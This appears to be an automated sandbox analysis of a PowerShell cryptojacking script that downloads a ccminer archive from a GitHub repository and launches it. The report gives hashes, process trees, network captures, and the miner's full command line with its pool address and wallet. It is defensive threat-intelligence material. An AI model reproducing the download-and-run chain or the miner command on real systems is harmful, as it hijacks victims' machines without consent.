Analysis
max time kernel: 1744s
max time network: 1798s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21/07/2024, 09:33 UTC
Static task: static1
Behavioral task: behavioral1 (sample: windows.ps1, resource: win10-20240404-en)
Behavioral task: behavioral2 (sample: windows.ps1, resource: win10v2004-20240709-en)
Behavioral task: behavioral3 (sample: windows.ps1, resource: win11-20240709-en)
General
Target: windows.ps1
Size: 467B
MD5: 63f6c82077c4c39d6d9101409b16a668
SHA1: 09d1960993c90f39607f437a2106b65db7aeae29
SHA256: 18284686feab2a0753bd0059a64004d8b86bb47048065cba12d323efbb6cc891
SHA512: 3bbf47af04fae3e7fd921bf1319e652c879d6132d4ea495cb7d6f47a38b9a4fb09f7be4af14c2d0c7357febd893c16639268dc82ec3b9194d0d4dc54723e1a34
Malware Config
Signatures

Blocklisted process makes network request (1 IoC)
  flow 21, pid 4884, process powershell.exe

Executes dropped EXE (1 IoC)
  pid 1720, process ccminer.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow 20, ioc raw.githubusercontent.com
  flow 21, ioc raw.githubusercontent.com
  pid 4884, process powershell.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid 4884, process powershell.exe
  pid 4884, process powershell.exe

Suspicious use of AdjustPrivilegeToken (22 IoCs)
  All entries: pid 4884, process powershell.exe. Tokens enabled:
  SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

Suspicious use of WriteProcessMemory (4 IoCs)
  PID 4884 (powershell.exe) wrote to memory of PID 1720 (procid_target 92)
  PID 4884 (powershell.exe) wrote to memory of PID 1720 (procid_target 92)
  PID 1720 (ccminer.exe) wrote to memory of PID 3940 (procid_target 93)
  PID 1720 (ccminer.exe) wrote to memory of PID 3940 (procid_target 93)
Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 1, PID 4884)
  Command line: powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows.ps1
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\ccminer\ccminer\ccminer.exe (depth 2, PID 1720, child of 4884)
    Command line: "C:\Users\Admin\AppData\Local\Temp\ccminer\ccminer\ccminer.exe" -a verus -o stratum+tcp://de.vipor.net:5040 -u RHACKERwSVgjTvV4vNiTjmrkLTD7a92ALD.Windows -p x -t 2
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe (depth 3, PID 3940, child of 1720)
      Command line: C:\Windows\system32\cmd.exe /c cls
Network
-
Remote address: 8.8.8.8:53
  Request: g.bing.com IN A
  Response: g.bing.com IN CNAME g-bing-com.dual-a-0034.a-msedge.net; g-bing-com.dual-a-0034.a-msedge.net IN CNAME dual-a-0034.a-msedge.net; dual-a-0034.a-msedge.net IN A 13.107.21.237; dual-a-0034.a-msedge.net IN A 204.79.197.237
-
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
Remote address: 13.107.21.237:443
Request:
GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
Response:
HTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=137444ECC9766C050345502FC8966D64; domain=.bing.com; expires=Fri, 15-Aug-2025 16:34:38 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D88FDBB84E184A4FAE500E883A935A8B Ref B: LON04EDGE1115 Ref C: 2024-07-21T16:34:38Z
date: Sun, 21 Jul 2024 16:34:38 GMT
-
GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
Remote address: 13.107.21.237:443
Request:
GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=137444ECC9766C050345502FC8966D64
Response:
HTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=eXxgYmRnc5jzz5-jZxr6cca5Fc7ebRocqaOhWewdWk8; domain=.bing.com; expires=Fri, 15-Aug-2025 16:34:38 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F819D5F49C144358ADB7B042CEFE732B Ref B: LON04EDGE1115 Ref C: 2024-07-21T16:34:38Z
date: Sun, 21 Jul 2024 16:34:38 GMT
-
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
Remote address: 13.107.21.237:443
Request:
GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=137444ECC9766C050345502FC8966D64; MSPTC=eXxgYmRnc5jzz5-jZxr6cca5Fc7ebRocqaOhWewdWk8
Response:
HTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DA372826A6164EEDB881288D2EEF66BD Ref B: LON04EDGE1115 Ref C: 2024-07-21T16:34:38Z
date: Sun, 21 Jul 2024 16:34:38 GMT
-
Remote address: 8.8.8.8:53
  Request: 183.142.211.20.in-addr.arpa IN PTR
  Response: (no records)
-
Remote address: 8.8.8.8:53
  Request: 240.221.184.93.in-addr.arpa IN PTR
  Response: (no records)
-
Remote address: 8.8.8.8:53
  Request: 20.160.190.20.in-addr.arpa IN PTR
  Response: (no records)
-
Remote address: 8.8.8.8:53
  Request: raw.githubusercontent.com IN A
  Response: raw.githubusercontent.com IN A 185.199.111.133; raw.githubusercontent.com IN A 185.199.110.133; raw.githubusercontent.com IN A 185.199.109.133; raw.githubusercontent.com IN A 185.199.108.133
-
GET https://raw.githubusercontent.com/MomboteQ/mining-scripts/main/verus/ccminer-win.zip
Process: powershell.exe
Remote address: 185.199.111.133:443
Request:
GET /MomboteQ/mining-scripts/main/verus/ccminer-win.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: raw.githubusercontent.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Length: 1412223
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/zip
ETag: "19ccc6d11b3c33e877316ccc6d2b2e4b2ed7138fc831e088812c7f6a799d516d"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 3DA2:13AA55:15BD17:1C187B:669D103D
Accept-Ranges: bytes
Date: Sun, 21 Jul 2024 16:34:39 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600071-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1721579679.413721,VS0,VE3
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 907ea015f99ea47de1efee8b4d6ae9107e67eb99
Expires: Sun, 21 Jul 2024 16:39:39 GMT
Source-Age: 99
-
Remote address: 8.8.8.8:53
  Request: 88.156.103.20.in-addr.arpa IN PTR
  Response: (no records)
-
Remote address: 8.8.8.8:53
  Request: 237.21.107.13.in-addr.arpa IN PTR
  Response: (no records)
-
Remote address: 8.8.8.8:53
  Request: 133.111.199.185.in-addr.arpa IN PTR
  Response: 133.111.199.185.in-addr.arpa IN PTR cdn-185-199-111-133.github.com
-
Remote address: 8.8.8.8:53
  Request: de.vipor.net IN A
  Response: de.vipor.net IN CNAME de.vipordns.net; de.vipordns.net IN A 51.195.34.205
-
Remote address: 8.8.8.8:53
  Request: 205.34.195.51.in-addr.arpa IN PTR
  Response: 205.34.195.51.in-addr.arpa IN PTR ip205.ip-51-195-34.eu
-
Remote address: 8.8.8.8:53
  Request: 209.205.72.20.in-addr.arpa IN PTR
  Response: (no records)
-
Remote address: 8.8.8.8:53
  Request: 183.59.114.20.in-addr.arpa IN PTR
  Response: (no records)
-
Remote address: 8.8.8.8:53
  Request: 154.239.44.20.in-addr.arpa IN PTR
  Response: (no records)
-
Remote address: 8.8.8.8:53
  Request: 171.39.242.20.in-addr.arpa IN PTR
  Response: (no records)
-
Remote address: 8.8.8.8:53
  Request: 172.214.232.199.in-addr.arpa IN PTR
  Response: (no records)
-
Remote address: 8.8.8.8:53
  Request: 22.236.111.52.in-addr.arpa IN PTR
  Response: (no records)
-
Remote address: 8.8.8.8:53
  Request: 43.58.199.20.in-addr.arpa IN PTR
  Response: (no records)
-
Remote address: 8.8.8.8:53
  Request: tse1.mm.bing.net IN A
  Response: tse1.mm.bing.net IN CNAME mm-mm.bing.net.trafficmanager.net; mm-mm.bing.net.trafficmanager.net IN CNAME ax-0001.ax-msedge.net; ax-0001.ax-msedge.net IN A 150.171.28.10; ax-0001.ax-msedge.net IN A 150.171.27.10
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239339388130_1LUEK7XGBN2FMZI35&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239339388130_1LUEK7XGBN2FMZI35&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 838075
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6A1CB921DEB74D61A3AF5DAA5DCC459F Ref B: LON04EDGE0809 Ref C: 2024-07-21T16:39:19Z
date: Sun, 21 Jul 2024 16:39:19 GMT
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239317301205_1OM9XZCKYFXI34HLQ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239317301205_1OM9XZCKYFXI34HLQ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 940465
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 03EA86178B504F38B86AD6B168E8CAB5 Ref B: LON04EDGE0809 Ref C: 2024-07-21T16:39:19Z
date: Sun, 21 Jul 2024 16:39:19 GMT
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239317300970_1WZNZYNWWAF6IP05J&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239317300970_1WZNZYNWWAF6IP05J&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 646893
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 10DEF1F731284E40B83D73DF3F9FB0B1 Ref B: LON04EDGE0809 Ref C: 2024-07-21T16:39:19Z
date: Sun, 21 Jul 2024 16:39:19 GMT
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239339388129_199HS4001G3EH5S78&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239339388129_199HS4001G3EH5S78&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 569199
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 131A92B973BE439482887CBCEAB031EA Ref B: LON04EDGE0809 Ref C: 2024-07-21T16:39:19Z
date: Sun, 21 Jul 2024 16:39:19 GMT
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239317301403_18A51FWD0ORQI7TWA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239317301403_18A51FWD0ORQI7TWA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 771044
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5A45366F78A84577AC5FF8FCEA7F53DF Ref B: LON04EDGE0809 Ref C: 2024-07-21T16:39:19Z
date: Sun, 21 Jul 2024 16:39:19 GMT
-
GET https://tse1.mm.bing.net/th?id=OADD2.10239317301614_1PEIP2AXZTPQ08R0S&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239317301614_1PEIP2AXZTPQ08R0S&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 563726
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9C7D5ADC70924AC9894A8C83993B243B Ref B: LON04EDGE0809 Ref C: 2024-07-21T16:39:49Z
date: Sun, 21 Jul 2024 16:39:49 GMT
-
Remote address: 8.8.8.8:53
  Request: 85.65.42.20.in-addr.arpa IN PTR
  Response: (no records)
-
Flow: 13.107.21.237:443  https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=  tls, http2  2.0kB 9.3kB 21 19
  HTTP Request: GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
  HTTP Response: 204
  HTTP Request: GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
  HTTP Response: 204
  HTTP Request: GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7b432bc62f6c418487e45ff331f61049&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
  HTTP Response: 204
Flow: 185.199.111.133:443  https://raw.githubusercontent.com/MomboteQ/mining-scripts/main/verus/ccminer-win.zip  tls, http  powershell.exe  37.0kB 1.5MB 674 1064
  HTTP Request: GET https://raw.githubusercontent.com/MomboteQ/mining-scripts/main/verus/ccminer-win.zip
  HTTP Response: 200
365.1kB 63.3kB 556 330
-
1.2kB 6.9kB 15 13
-
1.2kB 6.9kB 15 13
-
Flow: 150.171.28.10:443  https://tse1.mm.bing.net/th?id=OADD2.10239317301614_1PEIP2AXZTPQ08R0S&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90  tls, http2  169.6kB 4.5MB 3262 3254
  HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239339388130_1LUEK7XGBN2FMZI35&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
  HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239317301205_1OM9XZCKYFXI34HLQ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
  HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239317300970_1WZNZYNWWAF6IP05J&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
  HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239339388129_199HS4001G3EH5S78&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
  HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239317301403_18A51FWD0ORQI7TWA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
  HTTP Response: 200
  HTTP Response: 200
  HTTP Response: 200
  HTTP Response: 200
  HTTP Response: 200
  HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239317301614_1PEIP2AXZTPQ08R0S&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
  HTTP Response: 200
1.2kB 8.3kB 16 14
-
1.4kB 6.9kB 16 13
-
56 B 151 B 1 1
DNS Request
g.bing.com
DNS Response
13.107.21.237, 204.79.197.237
-
73 B 159 B 1 1
DNS Request
183.142.211.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
240.221.184.93.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
20.160.190.20.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
raw.githubusercontent.com
DNS Response
185.199.111.133, 185.199.110.133, 185.199.109.133, 185.199.108.133
-
72 B 158 B 1 1
DNS Request
88.156.103.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
237.21.107.13.in-addr.arpa
-
74 B 118 B 1 1
DNS Request
133.111.199.185.in-addr.arpa
-
58 B 100 B 1 1
DNS Request
de.vipor.net
DNS Response
51.195.34.205
-
72 B 107 B 1 1
DNS Request
205.34.195.51.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
183.59.114.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
154.239.44.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
171.39.242.20.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
22.236.111.52.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
43.58.199.20.in-addr.arpa
-
62 B 170 B 1 1
DNS Request
tse1.mm.bing.net
DNS Response
150.171.28.10, 150.171.27.10
-
70 B 156 B 1 1
DNS Request
85.65.42.20.in-addr.arpa
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 652KB
MD5: 153e4364a395b282b983dfc2c5884105
SHA1: 9147a6afa63bd7d7e451c693e362730c692781e1
SHA256: 6a1077166de9d1cc6fceaf6da6f8c5e1c8d9d5f99f3ab845b9790fc6d395d896
SHA512: 378fe8b9ae243d5844243999a909ab45216920d63149b39be521e5212533f0dc30e8620c6285738e1100618f44d1576b3ccd9aa27b0e65b29a3ca1937047173d